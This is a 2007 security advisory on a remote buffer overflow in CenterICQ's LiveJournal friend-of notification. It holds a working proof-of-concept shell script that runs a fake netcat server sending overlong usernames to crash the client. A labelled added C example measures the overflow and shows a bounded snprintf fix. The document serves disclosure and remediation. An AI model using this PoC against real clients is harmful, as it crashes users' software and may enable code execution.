========================================================================

                    TK53 Advisory #1                          01/07/2007

    - CenterICQ remote DoS buffer overflow in LiveJournal handling

========================================================================

* Authors: Lolek of TK53 <lolek1337@gmail.com>, Roflek of TK53 <roflek1337@gmail.com>

* Affected program: CenterICQ (http://thekonst.net/centericq/)

* Affected versions: 4.9.11 - 4.21.0

* Overview:
  CenterICQ contains support for LiveJournal (http://www.livejournal.com/),
  such as posting to your own blog, reading other blogs' RSS feeds, and other
  community-related functions, such as telling you when another user has
  added you to or removed you from their friend list, all via the unified
  HTTP interface provided by LiveJournal. The latter functionality (the
  friend-of notification) is vulnerable to a buffer overflow that crashes
  the client and may allow remote code execution.

== Vulnerability Details ==

$SOURCE/src/hooks/ljhook.cc:

    char buf[512];
    ...
            if(find(friendof.begin(), friendof.end(), in->first) == friendof.end()) {
                friendof.push_back(in->first);

                if(!foempty) {
                    bd = (string) "http://" + conf.getourid(proto).server + "/users/" + in->first;

                    sprintf(buf, _("The user %s (%s) has added you to his/her friend list\n\nJournal address: %s"),
                        in->first.c_str(), in->second.c_str(), bd.c_str());

                    em.store(imnotification(self, buf));
                }
            }
    ...

CenterICQ regularly asks the server for the friends list (#define
PERIOD_FRIENDS 3600, i.e. the check runs every 3600 seconds). Every friend-of
entry in the reply that is not yet in the local friendof vector is appended
and, unless foempty is set, announced with the notification built by the
sprintf above. So if you are already in the friend list of at least one user
(the local friend-of list is not empty, hence foempty is false) and another
user adds you to his friend list, the !foempty branch is taken and sprintf
writes into buf.

Neither the username (in->first) nor the real name (in->second) is length
checked anywhere before that call. The username is written twice, once
directly and once inside the journal address bd, which also carries the
configured server name, so buf is overrun whenever

  2*length(username) + length(realname) + length(server) + length(fixed text)
      >= sizeof(buf)

where the fixed text is the literal part of the format string (whose length
depends on the locale, since it goes through _()) plus "http://" and
"/users/". buf is a plain 512-byte C array and sprintf does not know its
size, so the excess bytes simply overwrite whatever follows it.

The only reason this is not exploitable against the official LiveJournal
servers is that LiveJournal enforces a length limit on both the username (15
characters) and the real name (50 characters), which keeps the message far
below 512 bytes. But since the server used for communication is configurable
within CenterICQ (lj_server), and since LiveJournal publishes its backend
under the GPL, anyone who can answer the client's friend-list request, for
example by running a modified server or by tampering with the plain HTTP
traffic, can hand it arbitrarily long names. The risk of buffer overflow and
exploitation therefore does exist.

== Proof of Concept Exploit ==

Add the following to your ~/.centericq/conf:

lj_nick           randomname
lj_pass           randompass
lj_server         localhost:8000
lj_status         o
lj_importfriends  1

Start the following shell script, then start CenterICQ and be patient because
of the PERIOD_FRIENDS delay (3600 seconds, i.e. one hour), or set
PERIOD_FRIENDS to 10 or so in the source and recompile.

The following shell script is a very simple proof-of-concept demonstration of
the buffer overflow:

--- SNIP ---
#!/bin/sh
# Fake LiveJournal server for the friend-of check. Each netcat answers one
# connection on port 8000: the first reply seeds a non-empty friend-of list
# (so foempty is false afterwards), the second adds an ordinary user, the
# third adds a user whose username and real name are far longer than buf[512].

# Write a complete HTTP/1.0 response for the body file in $1 to stdout.
# Content-length is computed from the body, so it is right for every reply
# (the three bodies differ in size).
respond() {
cat << __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/
Content-length: $(wc -c < "$1" | tr -d ' ')
Connection: close
Content-Type: text/plain

__EOF
cat "$1"
}

# Reply 1: four friends, one user (roflek) who has us in his friend list.
cat > body1.txt << __EOF
friend_1_bg
#ffffff
friend_1_fg
#000000
friend_1_name
jwz
friend_1_user
jwz
friend_2_bg
#ffffff
friend_2_fg
#000000
friend_2_name
LJ Maintenance
friend_2_type
community
friend_2_user
lj_maintenance
friend_3_bg
#ffffff
friend_3_fg
#000000
friend_3_name
LJ Spotlight
friend_3_type
community
friend_3_user
lj_spotlight
friend_4_bg
#ffffff
friend_4_fg
#000000
friend_4_name
LiveJournal News
friend_4_type
news
friend_4_user
news
friend_count
4
friendof_1_bg
#ffffff
friendof_1_fg
#000000
friendof_1_name
roflek
friendof_1_user
roflek
friendof_count
1
success
OK
__EOF

# Reply 2: same, plus a second, harmless friend-of entry (foo).
cat > body2.txt << __EOF
friend_1_bg
#ffffff
friend_1_fg
#000000
friend_1_name
jwz
friend_1_user
jwz
friend_2_bg
#ffffff
friend_2_fg
#000000
friend_2_name
LJ Maintenance
friend_2_type
community
friend_2_user
lj_maintenance
friend_3_bg
#ffffff
friend_3_fg
#000000
friend_3_name
LJ Spotlight
friend_3_type
community
friend_3_user
lj_spotlight
friend_4_bg
#ffffff
friend_4_fg
#000000
friend_4_name
LiveJournal News
friend_4_type
news
friend_4_user
news
friend_count
4
friendof_1_bg
#ffffff
friendof_1_fg
#000000
friendof_1_name
roflek
friendof_1_user
roflek
friendof_2_bg
#ffffff
friendof_2_fg
#000000
friendof_2_name
foo
friendof_2_user
foo
friendof_count
2
success
OK
__EOF

# Reply 3: a third friend-of entry whose name and username overflow buf.
cat > body3.txt << __EOF
friend_1_bg
#ffffff
friend_1_fg
#000000
friend_1_name
jwz
friend_1_user
jwz
friend_2_bg
#ffffff
friend_2_fg
#000000
friend_2_name
LJ Maintenance
friend_2_type
community
friend_2_user
lj_maintenance
friend_3_bg
#ffffff
friend_3_fg
#000000
friend_3_name
LJ Spotlight
friend_3_type
community
friend_3_user
lj_spotlight
friend_4_bg
#ffffff
friend_4_fg
#000000
friend_4_name
LiveJournal News
friend_4_type
news
friend_4_user
news
friend_count
4
friendof_1_bg
#ffffff
friendof_1_fg
#000000
friendof_1_name
roflek
friendof_1_user
roflek
friendof_2_bg
#ffffff
friendof_2_fg
#000000
friendof_2_name
lolek
friendof_2_user
lolek
friendof_3_bg
#ffffff
friendof_3_fg
#000000
friendof_3_name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
friendof_3_user
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
friendof_count
3
success
OK
__EOF

respond body1.txt > req1.txt
respond body2.txt > req2.txt
respond body3.txt > req3.txt

netcat -lp 8000 < req1.txt
netcat -lp 8000 < req2.txt
netcat -lp 8000 < req3.txt

--- SNIP ---

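== Added example: measuring the overflow and a bounded replacement ==

The following C program is an added example; it is not part of the TK53
advisory and not CenterICQ code. It reproduces the length arithmetic of the
sprintf() quoted above (same format string, untranslated, with the journal
address inlined so the bytes match), parses a LiveJournal flat reply of the
"key\nvalue\n" shape served by req1.txt-req3.txt, walks the friendof_N
entries the way ljhook.cc does, and puts a snprintf()-based replacement next
to the unchecked call. BUF_SIZE mirrors the char buf[512] in ljhook.cc; the
function names (notify_needed, notify_safe, lj_flat_get,
count_overflowing_friendof, poc_hits), the constructed sample reply and the
use of localhost:8000 and www.livejournal.com as server names are this
example's own assumptions.

```c
/* Added example, not CenterICQ code: the sprintf() length arithmetic from
 * ljhook.cc, a parser for the LJ flat reply, and a bounded replacement. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 512   /* sizeof(buf) in ljhook.cc */

/* Untranslated format from ljhook.cc with bd = "http://"+server+"/users/"+user
 * inlined, so the bytes are identical; the real _() wrapper may lengthen it. */
static const char *const NOTIFY_FMT =
    "The user %s (%s) has added you to his/her friend list\n\n"
    "Journal address: http://%s/users/%s";

/* Bytes the original sprintf() writes into buf, NUL terminator included. */
size_t notify_needed(const char *server, const char *user, const char *realname)
{
    int n = snprintf(NULL, 0, NOTIFY_FMT, user, realname, server, user);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Bounded replacement: at most bufsz bytes, always NUL-terminated; 1 = fit, 0 = truncated. */
int notify_safe(char *buf, size_t bufsz, const char *server, const char *user, const char *realname)
{
    int n = snprintf(buf, bufsz, NOTIFY_FMT, user, realname, server, user);
    return n >= 0 && (size_t)n < bufsz;
}

/* Value of `key` in an LJ flat reply ("key\nvalue\n" pairs): malloc'd copy, or NULL. */
char *lj_flat_get(const char *resp, const char *key)
{
    size_t klen = strlen(key);
    for (const char *p = resp; *p; ) {
        const char *knl = strchr(p, '\n');
        size_t kl = knl ? (size_t)(knl - p) : strlen(p);
        const char *v = knl ? knl + 1 : p + kl;           /* the value line */
        const char *vnl = strchr(v, '\n');
        size_t vl = vnl ? (size_t)(vnl - v) : strlen(v);
        if (kl == klen && memcmp(p, key, klen) == 0) {
            char *out = malloc(vl + 1);
            if (out) { memcpy(out, v, vl); out[vl] = '\0'; }
            return out;
        }
        p = vnl ? vnl + 1 : v + vl;                       /* skip key and value */
    }
    return NULL;
}

/* Walk friendof_1..friendof_count as ljhook.cc does, but through notify_safe():
 * each entry it must truncate is one sprintf() would have written past buf. */
int count_overflowing_friendof(const char *resp, const char *server)
{
    char buf[BUF_SIZE], *cnt = lj_flat_get(resp, "friendof_count");
    long n = cnt ? strtol(cnt, NULL, 10) : 0;
    int hits = 0;
    free(cnt);
    for (long i = 1; i <= n; i++) {
        char ukey[32], nkey[32];
        snprintf(ukey, sizeof ukey, "friendof_%ld_user", i);
        snprintf(nkey, sizeof nkey, "friendof_%ld_name", i);
        char *user = lj_flat_get(resp, ukey), *name = lj_flat_get(resp, nkey);
        if (user && name && !notify_safe(buf, sizeof buf, server, user, name))
            hits++;
        free(user);
        free(name);
    }
    return hits;
}

/* Constructed reply shaped like req3.txt: one ordinary friend-of entry plus one
 * whose username and name are `alen` bytes of 'A'. Returns its overflow count. */
int poc_hits(size_t alen, const char *server)
{
    static const char fmt[] = "friendof_1_name\nroflek\nfriendof_1_user\nroflek\n"
        "friendof_2_name\n%s\nfriendof_2_user\n%s\nfriendof_count\n2\nsuccess\nOK\n";
    char *as = calloc(alen + 1, 1), *resp = NULL;     /* zeroed: ends in NUL */
    int n, hits = -1;
    if (!as) return -1;
    memset(as, 'A', alen);
    n = snprintf(NULL, 0, fmt, as, as);
    if (n >= 0 && (resp = malloc((size_t)n + 1)) != NULL) {
        snprintf(resp, (size_t)n + 1, fmt, as, as);
        hits = count_overflowing_friendof(resp, server);
    }
    free(as);
    free(resp);
    return hits;
}

int main(void)
{
    size_t len = 0;    /* shortest name that overflows against localhost:8000 */
    while (poc_hits(len + 1, "localhost:8000") == 0) len++;
    printf("a %zu-byte username/realname overflows; LJ allows 15/50\n", len + 1);
    return 0;
}
```

Compile with cc -std=c99 -Wall ljcheck.c -o ljcheck. Running it prints the
shortest username (used for both fields, as in req3.txt) that pushes the
message past 512 bytes when the server is localhost:8000, well above
LiveJournal's own 15/50 limits but trivially reachable from a server you
control. notify_safe() is the whole fix: snprintf() with sizeof(buf) never
writes past buf, and its return value tells the caller the message was cut
instead of silently corrupting memory.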